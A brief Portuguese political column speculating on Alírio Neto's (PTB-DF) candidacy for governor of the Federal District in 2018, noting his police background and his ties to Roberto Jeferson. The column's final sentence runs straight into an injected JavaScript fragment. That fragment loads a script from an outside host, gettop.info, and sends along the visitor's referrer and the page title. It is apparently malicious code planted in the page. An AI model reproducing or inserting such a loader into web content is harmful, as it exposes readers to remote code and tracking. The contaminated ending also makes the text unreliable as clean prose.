Alírio Neto, presidente do PTB-DF, é um dos que pretendem concorrer ao Palácio do Buriti em 2018. Ele já foi deputado distrital, é delegado aposentado da Polícia Civil e concorreu a federal em 2014, recebendo 78.945 votos.
Inicialmente, as pretensões do ex-distrital foram levadas no deboche. Porém, suas articulações mostram outro cenário, ainda mais que o seu mentor é o presidente nacional do PTB, Roberto Jeferson, o homem que detonou o Mensalão do PT.
O desafio de Alírio é se viabilizar, convencer os seus pares da direita de que é o nome certo para liderar a corrida palaciana. Com vários nomes saindo do jogo devido a denúncias de prática de corrupção e à ligação com um passado assombroso as pretensões de Alírio vão ganhando corpo.
Dizem no meio político que Alírio está blefando. Mas não é bem assim. O delegado nascido em Piripiri, no Piauí, enxergou que a disputa está aberta e vê chances de viabilizar seu nome para entrar no pesado jogo sucessório.
Na corrida ao Buriti, não basta ser um nome. O passado pode bater na porta, e aquele que está blefando pode ser o nome de amanhã. E assim Alírio vai pavimentando o seu caminho. 2018 é logo ali…s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;